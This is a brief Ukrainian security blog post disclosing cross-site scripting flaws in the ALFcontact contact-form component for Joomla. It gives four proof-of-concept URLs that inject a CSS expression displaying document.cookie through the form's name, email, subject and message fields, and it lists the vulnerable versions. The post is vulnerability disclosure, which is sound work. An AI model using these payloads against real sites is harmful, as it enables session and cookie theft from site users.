Websecurity - Веб безпека

Сьогодні я знайшов Cross-Site Scripting уразливості в компоненті ALFcontact (com_alfcontact) для Joomla. Це форма відправки повідомлень власнику сайта. Дані уразливості я виявив на одному веб сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в com_alfcontact для Joomla.

XSS:

Можлива атака як через POST, так і GET запити.

http://site/component/option,com_alfcontact/?name=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?email=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?subject=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?message=%22%20style=%22xss:expression(alert(document.cookie))

Уразливі ALFcontact 1.8, 1.9 та попередні версії. У версії ALFcontact 1.9.1 працюють перші три з чотирьох уразливостей.

This entry was posted on 23:51 03.09.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.